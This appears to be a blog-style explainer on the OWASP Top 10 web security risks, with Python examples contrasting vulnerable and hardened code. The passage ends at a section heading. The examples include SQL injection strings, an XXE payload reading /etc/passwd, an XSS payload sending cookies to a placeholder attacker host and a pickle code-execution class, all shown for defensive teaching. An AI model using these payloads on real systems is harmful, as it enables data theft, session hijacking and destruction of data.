Keep Your Site Safe with the OWASP Top 10 List

Find out how the OWASP Top 10 can help protect you from the most dangerous security threats

Web security is a constantly evolving field, and the threats are endless. When one threat is stopped, it is only a matter of time before another takes its place. For developers of web applications and websites, the target they have to protect is always moving. Whether you are building the next big thing or maintaining an existing product or company, you will want to keep the fruits of your labour.

But with so many threats lurking in cyberspace, how do we know which ones are the most critical and widespread? Wouldn’t it be great if there were a simple list with them all on it? Well, it’s your lucky day, because the Open Web Application Security Project (OWASP) has put together a Top 10 of the biggest threats to your website.

This list, which is updated every few years, is an industry-standard document that everyone who manages a site should read. Reading it can mean the difference between avoiding the most dangerous vulnerabilities outright and merely limiting the damage after development and deployment.

What are the ten greatest weaknesses and how can you adequately protect yourself against them? And what’s the best way to proceed if you’re the victim of one of them?

Let’s hash it out.

What is OWASP?

Before we get to the OWASP Top 10, let’s talk about OWASP itself. The OWASP Foundation was established on 1 December 2001 and was incorporated as a non-profit organization in the United States on 21 April 2004. In the almost two decades since its founding, the number of volunteers worldwide has grown to almost 32,000. It is a well-known and trusted name in the industry, with more than 275 local chapters worldwide.

Since its inception, OWASP’s mission has been to improve the security of software. It uses an open community model, which means that anyone can contribute to its projects, events, webinars and more. It provides free material and information on its website, producing a wide range of media including videos, software tools, forums, live and virtual events and educational resources.

Essentially, OWASP is a repository for everything related to web application security, drawing on the diverse knowledge and experience of its members and open to the whole community. The group’s aim is to help organizations design, develop, acquire, operate and maintain secure websites and applications. In addition to providing articles, methodologies, documentation and tools, OWASP members also conduct security assessments and research.

What they are best known for, however, is the OWASP Top 10 list.

What is the OWASP Top 10?

The OWASP Top 10 list describes the most critical security risks for websites and web applications. It was first published in 2003 and is generally revised every three to four years based on developments in the AppSec landscape. Updates were released in 2004, 2007, 2010, 2013 and 2017.

The OWASP Top 10 focuses on the most critical vulnerabilities, examining the risks, their impact and the best countermeasures for addressing them. The list is compiled by a team of security experts from around the world and is intended to make organizations more aware of the main threats they face. OWASP recommends that all companies incorporate the findings of the report into their security processes and methods so as to minimize these vulnerabilities in their products.

The vulnerabilities themselves are rated on four different criteria:

  • Prevalence – how common is this weakness, and how well known is it to threat actors (such as hackers)?
  • Detectability – how easy is it for threat actors to find the weakness in an application?
  • Exploitability – how easy is it for threat actors to actually exploit the weakness once they have found it?
  • Business impact – how serious would the consequences of a successful exploit be for the company running the application?

In the original list, vulnerabilities were grouped by type so that the authors could cover as much ground as possible. However, it was difficult for readers to decide which weaknesses should have the highest priority, because there were no statistics to quantify them. Prioritization therefore became a subjective task for readers, and there are large differences in application types and threat models between organizations. After lengthy discussion, OWASP settled on a simpler list of the ten risks it considers relevant to the widest range of companies (the entries are ordered by OWASP’s risk rating, but every item on the list deserves attention).

Importance of OWASP Top 10

The most useful aspect of the OWASP Top 10 is that it gives organizations the information they need to focus their security efforts on the most important and effective areas. As a result, the list has been adopted as a baseline requirement by many of the world’s leading companies and is referenced by standards such as PCI DSS for payment processing. An organization’s failure to address the OWASP Top 10 is a strong signal to auditors that it does not meet those standards.

Web application attacks have become the leading cause of confirmed data breaches, according to Verizon’s 2018 Data Breach Investigations Report. Unfortunately, many organizations still struggle to implement and maintain an effective application security program because they simply don’t know where to start. The OWASP Top 10 can fill this gap by serving as an excellent starting point, since it covers the vulnerabilities most likely to be exploited (and most likely to cause data breaches that are very uncomfortable for both your business and your customers). By fixing them, you significantly reduce the risk of costly incidents.

And research shows that such measures are badly needed. As the chart below shows, the rate at which applications pass an OWASP Top 10 policy check is still alarmingly low. Perhaps even more worrying is that after the initial scan for the OWASP Top 10 vulnerabilities, compliance rises only slightly, which suggests that most companies do not take the results of the scan seriously.

Image source : Veracode

Most of the items on the OWASP Top 10 are not that difficult to find and fix, but remediation often stalls internally because developers are frequently not well trained in cybersecurity or secure coding. Conversely, security teams do not always have an accurate picture of what application security actually involves. It is not enough to scan or pen test a few critical applications once. Instead, everything an organisation develops or purchases needs to be evaluated continually, at every stage of its lifecycle, for the effort to be effective. Scanning for the OWASP Top 10 is important, but it is not a panacea; it should be part of a broader corporate security strategy.

Now that we’ve seen what this list is and how to use it, let’s take a closer look at these annoying vulnerabilities!


Top 10 OWASP Vulnerabilities

#1 – Injection

What is it?

Injection attacks can be carried out against interpreters such as SQL and NoSQL databases, operating system command shells, or directory servers (via protocols such as LDAP). They occur when hostile data is sent to the interpreter as part of a query or command. This data tricks the interpreter into executing commands that would otherwise be off-limits to outsiders, and it can also be used to access private data without proper authorization.

Example

Suppose you run an e-commerce store and reach a specific product by typing into your browser’s address bar:

  • http://www.yourstore.com/catalog/item.asp?itemid=999

The 999 is used to generate an SQL query that looks up what item 999 is. An attacker can manipulate this by entering something like:

  • http://www.yourstore.com/items/item.asp?itemid=999 or 1=1

which generates the SQL query:

Image source: Imperva

But because 1 always equals 1, the name and description of every item are returned (even the ones the owner doesn’t want you to see).

The attacker can go further by entering:

  • http://www.yourstore.com/items/item.asp?itemid=999; DROP TABLE Users

which now becomes the SQL:

Image source: Imperva

The end result? Your table is gone!

How to protect yourself

  • Validate and/or sanitise user-supplied data (validation rejects suspicious input; sanitisation strips the suspicious parts out of it)
  • Limit the amount of data any single query can expose
  • Use a safe API that avoids the interpreter entirely or provides a parameterised interface
  • Use SQL controls such as LIMIT to prevent mass disclosure of records if an injection does succeed
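The item lookup above, reproduced in Python against an in-memory SQLite database so the two injections (the "or 1=1" that dumps the catalogue and the stacked "; DROP TABLE") can be run and compared with the parameterised, validated version. This is an added example, not code from the article or from Imperva; the table layout, the "visible" column and the sample rows are constructed for the demonstration.

```python
import sqlite3

# Constructed sample catalogue (not from the article). The "visible" column is
# an assumption: it models rows the store owner does not want customers to see.
SAMPLE_ITEMS = [
    (999, "Blue Widget", "A visible catalogue item", 1),
    (1000, "Red Widget", "Another visible item", 1),
    (1001, "Internal SKU", "Unreleased product, not meant to be public", 0),
]


def make_db():
    """Build an in-memory SQLite database holding the sample catalogue."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE items (ItemNumber INTEGER, ItemName TEXT, "
        "ItemDescription TEXT, visible INTEGER)"
    )
    conn.executemany("INSERT INTO items VALUES (?, ?, ?, ?)", SAMPLE_ITEMS)
    conn.commit()
    return conn


def lookup_item_vulnerable(conn, itemid):
    """The itemid string is pasted into the SQL text, so the interpreter
    cannot tell attacker-supplied data from the query itself.
    '999 or 1=1' turns the WHERE clause into (visible = 1 AND ... ) OR 1=1."""
    sql = (
        "SELECT ItemName, ItemDescription FROM items "
        f"WHERE visible = 1 AND ItemNumber = {itemid}"
    )
    return conn.execute(sql).fetchall()


def run_stacked_vulnerable(conn, itemid):
    """Same concatenation, but through an API that accepts several statements
    separated by ';' (sqlite3.executescript here; many database drivers allow
    this by default), so '999; DROP TABLE items' runs both statements."""
    conn.executescript(
        "SELECT ItemName, ItemDescription FROM items "
        f"WHERE ItemNumber = {itemid}"
    )


def table_exists(conn, name):
    row = conn.execute(
        "SELECT count(*) FROM sqlite_master WHERE type='table' AND name=?", (name,)
    ).fetchone()
    return row[0] == 1


def lookup_item_safe(conn, itemid):
    """Validate first, then let the driver pass the value separately from the
    SQL text. LIMIT 1 caps what a single lookup can ever return."""
    try:
        item_number = int(itemid)
    except (TypeError, ValueError):
        raise ValueError("itemid must be an integer")  # reject, do not repair
    sql = (
        "SELECT ItemName, ItemDescription FROM items "
        "WHERE visible = 1 AND ItemNumber = ? LIMIT 1"
    )
    return conn.execute(sql, (item_number,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("normal:    ", lookup_item_vulnerable(db, "999"))
    print("or 1=1:    ", lookup_item_vulnerable(db, "999 or 1=1"))
    print("safe:      ", lookup_item_safe(db, "999"))
    run_stacked_vulnerable(db, "999; DROP TABLE items")
    print("table left:", table_exists(db, "items"))
```

Note that sqlite3's ordinary execute() refuses a second statement, which is why the stacked query goes through executescript(); the lesson is that whether "; DROP TABLE" works depends on the driver, while the concatenation bug is the same either way. The validated, parameterised lookup returns the one row for "999" and raises on "999 or 1=1" before any SQL is built.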

#2 – Broken Authentication

What is it?

Broken authentication refers to cases where authentication and session management functions have been implemented incorrectly. Credentials such as passwords, keys or session tokens can be compromised, and the weaknesses can be used to take over other users’ identities. Attackers may even gain access to an administrator account, putting the entire system at risk.

Example

Credential stuffing is a typical attack against broken authentication. Attackers take lists of known username and password pairs (e.g. from a data breach) and replay them against the application, which effectively acts as an oracle confirming whether each pair is valid.

How to protect yourself

  • Use multi-factor authentication
  • Rate-limit or increasingly delay failed login attempts
  • Do not ship or deploy with default credentials
  • Align password policies with section 5.1.1 of NIST SP 800-63B
  • Use the built-in, server-side session manager
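The "rate-limit or increasingly delay failed login attempts" item, as an added example (not code from the article): a login throttle that counts recent failures per account and per source IP and refuses further attempts for a doubling delay once a threshold is crossed, wrapped in a login function that gives the same answer for an unknown user and a wrong password. The thresholds and delays are an assumed policy, and password verification is an injected callable assumed to check a salted hash.

```python
import time
from collections import defaultdict, deque


class LoginThrottle:
    """Counts recent login failures per account and per source IP and refuses
    further attempts for an escalating delay once a threshold is crossed.
    The numbers below are an assumed policy, not something the article sets."""

    def __init__(self, threshold=5, window=300.0, base_delay=2.0, max_delay=900.0):
        self.threshold = threshold      # failures inside `window` before delays start
        self.window = window            # seconds a failure stays relevant
        self.base_delay = base_delay    # seconds; doubles with every further failure
        self.max_delay = max_delay
        self._failures = defaultdict(deque)   # (kind, id) -> timestamps of failures
        self._blocked_until = {}              # (kind, id) -> time the block ends

    @staticmethod
    def _keys(account, source_ip):
        return (("acct", account), ("ip", source_ip))

    def _recent_failures(self, key, now):
        q = self._failures[key]
        while q and now - q[0] > self.window:
            q.popleft()
        return len(q)

    def retry_after(self, account, source_ip, now=None):
        """Seconds the caller must wait before trying; 0.0 means go ahead."""
        now = time.monotonic() if now is None else now
        waits = [self._blocked_until.get(k, 0.0) - now
                 for k in self._keys(account, source_ip)]
        return max(0.0, *waits)

    def record_failure(self, account, source_ip, now=None):
        now = time.monotonic() if now is None else now
        for key in self._keys(account, source_ip):
            self._failures[key].append(now)
            n = self._recent_failures(key, now)
            if n >= self.threshold:
                delay = min(self.base_delay * 2 ** (n - self.threshold), self.max_delay)
                self._blocked_until[key] = now + delay

    def record_success(self, account, now=None):
        # A real login clears the account's counters; the IP's history is kept,
        # so a stuffing source gets no clean slate from one lucky hit.
        self._failures.pop(("acct", account), None)
        self._blocked_until.pop(("acct", account), None)


def login(throttle, verify_password, account, password, source_ip, now=None):
    """Returns ("ok", None), ("throttled", seconds) or ("denied", None).
    `verify_password(account, password)` is assumed to be a proper check
    against a salted hash; it is injected so this block stays about throttling.
    Unknown accounts and wrong passwords get the same answer, so the login
    form cannot be used to enumerate valid usernames."""
    wait = throttle.retry_after(account, source_ip, now)
    if wait > 0:
        return ("throttled", wait)
    if verify_password(account, password):
        throttle.record_success(account, now)
        return ("ok", None)
    throttle.record_failure(account, source_ip, now)
    return ("denied", None)
```

With the defaults, the fifth failure inside five minutes blocks both the account and the source address for two seconds, the sixth for four, and so on up to fifteen minutes; blocking per IP as well as per account is what slows a credential-stuffing run that spreads its attempts over many accounts.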

#3 – Sensitive Data Exposure

What is it?

Sensitive data exposure occurs when web applications and APIs do not adequately protect sensitive data such as financial or health information. Weakly protected data can easily be stolen by attackers to commit fraud, identity theft and other crimes.

Example

If a website does not enforce SSL/TLS on all pages, an attacker can monitor traffic, downgrade connections from HTTPS to HTTP, and then steal session cookies to hijack the session.

Another example is unsalted hashes. If passwords are stored using a plain, unsalted hash and an attacker gets hold of the database, the hashes can be cracked easily.

How to protect yourself

  • Identify sensitive data and apply appropriate controls
  • Encrypt all sensitive data, both in transit and at rest
  • Disable caching of sensitive information and do not store it unnecessarily
  • Store passwords using strong, salted, adaptive hash functions such as scrypt, bcrypt or Argon2
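The unsalted-hash example and the last bullet, side by side, as an added example (not from the article): a plain SHA-256 of the password falls to a precomputed table in one dictionary lookup, while a salted scrypt hash (the one adaptive function available in Python's standard library) gives every user a different hash and is verified in constant time. The scrypt work factors are an assumed baseline to be tuned per deployment.

```python
import base64
import hashlib
import hmac
import os

# scrypt work factors are an assumed baseline (not from the article); raise N
# until one hash takes tens of milliseconds on your own hardware.
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1


def unsalted_sha256(password):
    """The weak scheme: same password, same hash, for every user and site."""
    return hashlib.sha256(password.encode()).hexdigest()


def crack_unsalted(target_hex, wordlist):
    """Precompute once, match many: why unsalted fast hashes fall so quickly.
    With a salt, this table would have to be rebuilt for every single user."""
    table = {unsalted_sha256(w): w for w in wordlist}
    return table.get(target_hex)


def hash_password(password, salt=None):
    """Salted, memory-hard hash. The output is self-describing, so the work
    factors can be raised later without breaking older stored records."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.scrypt(password.encode(), salt=salt,
                            n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=32)
    return "$scrypt$%d$%d$%d$%s$%s" % (
        SCRYPT_N, SCRYPT_R, SCRYPT_P,
        base64.b64encode(salt).decode(),
        base64.b64encode(digest).decode(),
    )


def verify_password(password, stored):
    """Recompute with the stored salt and parameters; compare in constant time
    so timing does not leak how many leading bytes matched."""
    try:
        _, scheme, n, r, p, salt_b64, digest_b64 = stored.split("$")
        if scheme != "scrypt":
            return False
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(digest_b64)
        n, r, p = int(n), int(r), int(p)
    except ValueError:
        return False   # malformed record: treat as a failed login, never crash
    candidate = hashlib.scrypt(password.encode(), salt=salt,
                               n=n, r=r, p=p, dklen=len(expected))
    return hmac.compare_digest(candidate, expected)
```

Two users who pick the same password get two different records, so an attacker who dumps the table learns nothing from duplicates and cannot reuse work between accounts; bcrypt or Argon2 via a third-party library would be handled the same way, with the parameters stored alongside the hash.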

#4 – XML External Entities (XXE)

What is it?

These attacks target web applications that parse XML input. Older or misconfigured XML processors evaluate references to external entities (for example, a file on the server’s disk) inside XML documents. This can cause the XML parser to disclose data to an unauthorised party or to make requests on the attacker’s behalf, sending sensitive data straight to the attacker.

Example

The following XML can be used to extract data from the server:

Image source: Imperva

But an attacker can also probe a private network by changing the ENTITY line to the one below:

Image source: Imperva

How to protect yourself

  • Patch or upgrade all older XML parsers
  • Disable XML external entity and DTD processing in all XML parsers in the application
  • Where possible, accept less complex data formats such as JSON
  • Avoid serialization of sensitive data
  • Validate XML against an XSD schema or similar
  • Use allow-listing and server-side sanitisation of XML input
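The "disable external entity and DTD processing" bullet, as an added example built on Python's standard expat binding (not code from the article or from Imperva): a parser for a flat XML document that aborts the moment it sees a DOCTYPE, an entity declaration or an external entity reference, which is where every XXE payload (and the entity-expansion "billion laughs" payload) has to live. The two inputs are constructed; the second is the textbook file-read payload.

```python
from xml.parsers import expat


class UnsafeXML(ValueError):
    """Raised when a document tries to use DTD features the application never needs."""


def parse_untrusted_xml(data):
    """Parse a flat XML document into {leaf element name: text}, refusing any
    DOCTYPE, entity declaration or external entity reference before it is
    processed. Built on the stdlib expat binding; an added example."""
    result = {}
    stack = []    # (element name, list of text chunks)

    parser = expat.ParserCreate()

    def reject_doctype(doctype_name, system_id, public_id, has_internal_subset):
        # Entities can only be declared inside a DOCTYPE, so rejecting the
        # DOCTYPE closes the door on XXE and on entity-expansion bombs alike.
        raise UnsafeXML("DOCTYPE not allowed")

    def reject_entity(*decl):
        raise UnsafeXML("entity declaration not allowed")   # belt and braces

    def refuse_external(context, base, system_id, public_id):
        return 0    # tell expat to abort rather than fetch the entity

    def start(name, attrs):
        stack.append((name, []))

    def text(chunk):
        if stack:
            stack[-1][1].append(chunk)   # expat may deliver text in pieces

    def end(name):
        _, chunks = stack.pop()
        value = "".join(chunks).strip()
        if value:
            result[name] = value

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.ExternalEntityRefHandler = refuse_external
    parser.StartElementHandler = start
    parser.CharacterDataHandler = text
    parser.EndElementHandler = end
    parser.Parse(data, True)
    return result


# Constructed inputs: a normal order and the textbook XXE payload.
BENIGN_XML = b"<order><item>999</item><qty>2</qty></order>"
XXE_XML = (
    b'<?xml version="1.0"?>\n'
    b'<!DOCTYPE order [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>\n'
    b"<order><item>&xxe;</item><qty>2</qty></order>"
)
```

A parser that resolved the entity would have put the contents of /etc/passwd into the item element and echoed it back in whatever response the application builds; pointing the SYSTEM identifier at an internal URL instead turns the same parser into a proxy for scanning the private network. If the application must accept DTDs, keep the external-entity handler returning 0 and disable entity expansion in the library you use.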

#5 – Broken Access Control

What is it?

This occurs when restrictions on what authenticated users are allowed to do are not properly enforced. Attackers can exploit these flaws to gain unauthorized access, including viewing and modifying other users’ accounts, sensitive files, user data, access rights and so on.

Example

Suppose a web application takes an account number from the request and uses it in an SQL query without verifying that the caller is entitled to that account:

Image source: Imperva

The acct parameter can simply be changed to access any account you like:

Image source: Imperva

How to protect yourself

  • Deny access by default to everything except public resources
  • Build strong access control mechanisms and reuse them throughout the application
  • Enforce record ownership: do not let users create, read, update or delete any record they please
  • Disable web server directory listing and do not keep metadata (such as .git) or backup files in the web root
  • Log failed access attempts and alert on them
  • Rate-limit API and controller access
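The acct-parameter example and the "enforce record ownership" bullet as an added example (not the article's code): the vulnerable handler returns whatever account number it is given to any logged-in user, while the hardened one checks ownership on the server for every request, denies by default, gives the same answer for a missing and a foreign account, and records each denial. The accounts, users and the rule that a "support" role may read any account are constructed assumptions.

```python
# Constructed data: two customer accounts and one support user. The rule that
# "support" may read any account is an assumed policy, not from the article.
ACCOUNTS = {
    "1001": {"owner": "alice", "balance": 120},
    "1002": {"owner": "bob", "balance": 5000},
}
ROLES = {"alice": "customer", "bob": "customer", "carol": "support"}
DENIED_ATTEMPTS = []   # stands in for the security log / alerting pipeline


class Forbidden(Exception):
    pass


def get_account_vulnerable(session_user, acct):
    """Authenticated, but nothing ties the acct parameter to the caller:
    alice reads bob's account by changing ?acct=1001 to ?acct=1002."""
    return ACCOUNTS[acct]


def can_read(session_user, account):
    """Deny by default: only the listed reasons grant access."""
    if account["owner"] == session_user:
        return True
    if ROLES.get(session_user) == "support":
        return True
    return False


def get_account(session_user, acct):
    """Ownership is enforced on the server for every request. A missing
    account and someone else's account get the same answer, so the endpoint
    cannot be used to probe which account numbers exist, and every denial
    is recorded so a scan across account numbers shows up in monitoring."""
    account = ACCOUNTS.get(acct)
    if account is None or not can_read(session_user, account):
        DENIED_ATTEMPTS.append((session_user, acct))
        raise Forbidden("access denied")
    return account
```

The check belongs in the one place every account read passes through, not in each page that happens to render an account; a second endpoint that forgets it reintroduces the bug.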

#6 – Security Misconfiguration

What is it?

This is the most common vulnerability in the OWASP Top 10 and is usually the result of default configurations or credentials being left in place, or of overly verbose error messages. Such messages can reveal weaknesses inside the application.

Example

One example is a database still using the vendor’s default credentials. Nothing makes an attacker’s job easier than an administrator username and password that anyone can look up.

Another example is displaying a detailed error message (such as a full stack trace) to the user.

Such a message exposes the details of the application’s code, which a malicious third party can put to use. A much simpler error message in plain language is all that is needed.

How to protect yourself

  • Remove all unused features and frameworks
  • Display only generic error messages that do not reveal too much information
  • Use Static Application Security Testing (SAST) tools to find places where error handling leaks information

#7 – Cross-Site Scripting (XSS)

What is it?

This type of vulnerability is ultimately the result of untrusted input being rendered without validation or output encoding. It occurs when a web application lets a user add code (typically JavaScript) to a URL or page that is then displayed to other users. The malicious JavaScript runs in the victim’s browser.

Example

An attacker sends someone an email purporting to come from a reputable bank and includes a link to the bank’s website. The link, however, has malicious code appended to the end of the URL. If the bank’s website is not properly secured, clicking the link causes the malicious code to execute in the victim’s browser.

How to protect yourself

  • Use a Web Application Firewall (WAF) with signature-based filtering to identify and block attack traffic
  • Use frameworks that escape XSS by design, and learn the limits of each framework’s XSS protection so you can handle the cases it does not cover
  • Apply context-sensitive output encoding when modifying the document in the client’s browser
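The reflected-XSS link above and the "context-sensitive output encoding" bullet, as an added server-side example in Python (not the article's code): the same attacker-controlled value is rendered into an HTML text node, into a quoted attribute and into a JavaScript string literal, and each context needs a different encoder. The payload is constructed; the evil.example host is a placeholder.

```python
import html
import json

# Constructed reflected-XSS payload, of the kind appended to the link in the
# phishing email described above; evil.example is a placeholder host.
PAYLOAD = '<script>location="http://evil.example/?c="+document.cookie</script>'


def render_vulnerable(query):
    """Echoes the search term straight into the page: the script runs."""
    return "<p>Results for %s</p>" % query


def render_html_text(query):
    """HTML body context: &, <, > (and quotes) become entities, so the browser
    shows the payload as text instead of parsing it as markup."""
    return "<p>Results for %s</p>" % html.escape(query)


def render_attribute(value):
    """Attribute context: escape AND quote. Without the quotes, a value such as
    'x onmouseover=alert(1)' adds an event handler with no < or > at all."""
    return '<input name="q" value="%s">' % html.escape(value, quote=True)


def js_string_literal(value):
    """Script context: JSON gives a valid JS string literal, but a '</script>'
    inside it would still end the <script> block early, so <, > and & are
    written as \\uXXXX escapes, which JavaScript reads but the HTML parser does not."""
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def render_script(value):
    return "<script>var q = %s;</script>" % js_string_literal(value)
```

A template engine that auto-escapes covers the first case by default; the attribute and script cases are exactly the "limits of your framework's XSS protection" the bullet warns about, and URL and CSS contexts need their own encoders again.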

#8 – Insecure Deserialization

What is it?

Serialization converts objects from application code into a format that can be stored or transmitted, for example as a byte stream. Deserialization is the reverse, and when untrusted data is deserialized it can let attackers run malicious code on the server. Even where the flaw does not lead to remote code execution, attackers can still use it for replay attacks, injection attacks and privilege escalation.

Example

Think of moving house. Serialization is packing all your belongings into boxes; deserialization is unpacking them at the new address. Insecure deserialization is the movers adding, removing and rearranging items before the boxes are unpacked.

As a real-world example, a PHP forum uses object serialization to store a cookie containing the user ID, password hash and account level:

Image source: OWASP

The attacker can modify the serialized object to make themselves an administrator:

Image source: OWASP

How to protect yourself

  • Monitor deserialization and alert on unexpected types or excessive volume
  • Enforce strict type constraints during deserialization
  • Do not deserialize data from untrusted sources, or protect it with an integrity check such as a digital signature
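The forum-cookie example translated to Python as an added example (not from the article or OWASP): a session cookie built with pickle can be rewritten to claim the admin role, and, worse, a crafted pickle runs code of the attacker's choosing inside pickle.loads before the application looks at it. The hardened version stores only JSON, authenticates it with an HMAC that is checked before parsing, and validates the shape of what comes out. The secret, the marker environment variable and the session fields are constructed assumptions.

```python
import base64
import hashlib
import hmac
import json
import os
import pickle

MARKER_VAR = "PICKLE_DEMO_RAN"   # assumed name, used only to observe the exploit safely


class Exploit:
    """pickle records whatever __reduce__ returns and calls it during loads,
    before the application ever looks at the resulting object."""
    def __reduce__(self):
        # Real payloads put os.system or subprocess here; this one only sets an
        # environment variable so the effect can be checked without harm.
        return (exec, ("import os; os.environ['%s'] = 'yes'" % MARKER_VAR,))


def exploit_ran():
    return os.environ.get(MARKER_VAR) == "yes"


# -- vulnerable: native object serialization, trusted straight from the client --
def make_session_vulnerable(user):
    return base64.b64encode(pickle.dumps(user)).decode()


def load_session_vulnerable(cookie):
    return pickle.loads(base64.b64decode(cookie))


def attacker_cookie(obj):
    """What an attacker submits: any pickle they like, base64-encoded."""
    return base64.b64encode(pickle.dumps(obj)).decode()


# -- hardened: a data-only format, integrity-checked before it is parsed --
SECRET = b"assumed server-side secret; load it from configuration in real code"


class InvalidSession(ValueError):
    pass


def _encode(user):
    return json.dumps(user, sort_keys=True, separators=(",", ":")).encode()


def make_session(user):
    body = _encode(user)
    tag = hmac.new(SECRET, body, hashlib.sha256).digest()
    return "%s.%s" % (base64.urlsafe_b64encode(body).decode(),
                      base64.urlsafe_b64encode(tag).decode())


def load_session(cookie):
    try:
        body_b64, tag_b64 = cookie.split(".")
        body = base64.urlsafe_b64decode(body_b64)
        tag = base64.urlsafe_b64decode(tag_b64)
    except ValueError:
        raise InvalidSession("malformed cookie")
    expected = hmac.new(SECRET, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise InvalidSession("signature mismatch")   # checked BEFORE parsing
    user = json.loads(body)   # JSON yields only plain data, never objects
    if (not isinstance(user, dict) or not isinstance(user.get("id"), int)
            or user.get("role") not in ("user", "admin")):
        raise InvalidSession("unexpected session shape")
    return user


def tamper_session(cookie, **changes):
    """The attacker's attempt against the hardened cookie: rewrite fields in
    the JSON body while keeping the original tag."""
    body_b64, tag_b64 = cookie.split(".")
    user = json.loads(base64.urlsafe_b64decode(body_b64))
    user.update(changes)
    return "%s.%s" % (base64.urlsafe_b64encode(_encode(user)).decode(), tag_b64)
```

The order matters: the HMAC is verified over the raw bytes before json.loads ever runs, so even the parser is never exposed to unauthenticated input, and a data-only format means there is no class whose deserialization hook an attacker could reach.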

#9 – Using Components with Known Vulnerabilities

What is it?

Web developers often use existing components in their applications to avoid reinventing the wheel while still providing the required functionality. Attackers look for vulnerabilities in these components that they can use to attack the application itself. The most popular components can be used on hundreds of thousands of websites, and a single vulnerability can put all of them at risk.

Example

The Equifax breach of 2017 is a textbook example of this type of vulnerability. It was caused by an Apache Struts version with a known vulnerability that had been disclosed months before the attack. Had they simply acted on this item of the OWASP Top 10 and patched, they could have saved themselves a settlement of up to $700 million!

How to protect yourself

  • Continuously monitor for the latest security patches and updates for your components
  • Remove unused components from your project
  • Obtain components only from trusted sources
  • Use Software Composition Analysis (SCA) tools to identify outdated or vulnerable components

#10 – Insufficient Logging and Monitoring

What is it?

Logging and monitoring must be carried out continuously to keep a website secure. Without them, you increase the risk of attacks going unnoticed and you may be unable to respond when they occur. The average time to detect a breach is about 200 days. That gives attackers plenty of time to crack, extract or destroy data, pivot to other systems and generally wreak havoc.

Example

Earlier we discussed credential stuffing, where cybercriminals repeatedly try leaked username and password pairs. Say that after 100 attempts they finally hit the right combination for a particular account. Because there was no logging or monitoring, nobody was ever alerted to the alarming number of login attempts. Otherwise, the activity would have been flagged as suspicious and the breach could easily have been prevented.

How to protect yourself

  • Set up logging and monitoring for all aspects of your web application
  • Create an incident response plan with alerting, so you are immediately aware of a possible attack
  • Make sure your logs are in a format that centralized log management solutions can easily consume
  • Configure your logs to carry enough context to identify suspicious or malicious accounts
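The credential-stuffing scenario above, turned into detection logic as an added example (not the article's code): a single pass over authentication log lines that raises an alert when one source IP or one account accumulates too many failures inside a window, and a second alert when a login succeeds right after a burst of failures, which is the moment the attackers in the story "finally hit the right combination". The log format, the sample lines and the thresholds are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log lines in an assumed format (the article specifies none):
# one stuffing burst from 203.0.113.5 that succeeds on alice, and one user
# who mistypes a password once before logging in normally.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z auth ip=203.0.113.5 user=alice result=FAIL
2024-05-01T10:00:02Z auth ip=203.0.113.5 user=bob result=FAIL
2024-05-01T10:00:03Z auth ip=203.0.113.5 user=carol result=FAIL
2024-05-01T10:00:04Z auth ip=203.0.113.5 user=dave result=FAIL
2024-05-01T10:00:05Z auth ip=203.0.113.5 user=erin result=FAIL
2024-05-01T10:00:06Z auth ip=203.0.113.5 user=alice result=OK
2024-05-01T10:30:00Z auth ip=198.51.100.7 user=frank result=FAIL
2024-05-01T10:30:30Z auth ip=198.51.100.7 user=frank result=OK
this line is not an auth event
""".splitlines()

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\dZ) auth "
    r"ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$"
)


def parse_line(line):
    """Return {"ts", "ip", "user", "result"} or None for lines in another format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ev


def detect(lines, fail_threshold=5, success_threshold=3, window=timedelta(minutes=5)):
    """One pass over the log, oldest first. Returns {"alerts": [...], "skipped": n}.
    - failure alert: `fail_threshold` failures for one IP or one account inside `window`
    - success alert: a login succeeds while the IP and account together carry at least
      `success_threshold` recent failures; a single typo before success stays quiet."""
    recent = {"ip": defaultdict(deque), "user": defaultdict(deque)}
    already = set()          # alert once per (kind, key) per burst
    alerts, skipped = [], 0

    def prune(q, now):
        while q and now - q[0] > window:
            q.popleft()
        return len(q)

    for ev in map(parse_line, lines):
        if ev is None:
            skipped += 1      # count rather than silently drop: parser drift is itself a signal
            continue
        now = ev["ts"]
        keys = (("ip", ev["ip"]), ("user", ev["user"]))
        if ev["result"] == "FAIL":
            for kind, key in keys:
                q = recent[kind][key]
                q.append(now)
                if prune(q, now) >= fail_threshold and (kind, key) not in already:
                    already.add((kind, key))
                    alerts.append("%d failed logins for %s %s within %s"
                                  % (len(q), kind, key, window))
        else:
            n = sum(prune(recent[kind][key], now) for kind, key in keys)
            if n >= success_threshold:
                alerts.append("successful login for %s from %s after %d recent failures"
                              % (ev["user"], ev["ip"], n))
    return {"alerts": alerts, "skipped": skipped}
```

On the sample, the burst trips the per-IP alert at the fifth failure even though each account was tried only once, and the success for alice is flagged because of the source's history; frank's single mistake produces nothing. The same counters run as a stream against a live log feed, which is what turns "logging" into "monitoring".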

Coding Practices and the OWASP Top 10

Most importantly, your team should fully understand the vulnerabilities on the OWASP Top 10 and avoid coding practices that leave you exposed. Secure coding frameworks help developers find and fix vulnerabilities as they write, because they are coding against known-good patterns.

However, even the best coding practices and tools cannot always protect against human error, so it is always worth taking additional measures such as automated website protection with a WAF. Ideally, this should be part of a range of application-layer technologies and services, including dynamic and static analysis. Static analysis is performed without running the application, examining it from the inside via its source code. Dynamic analysis is the opposite: it exercises the running application to discover vulnerabilities.

Once you have the right coding practices, the right tools and the right security software in place, it comes down to implementing organizational best practices.

Organisational Strategy for Protecting Against the OWASP Top 10

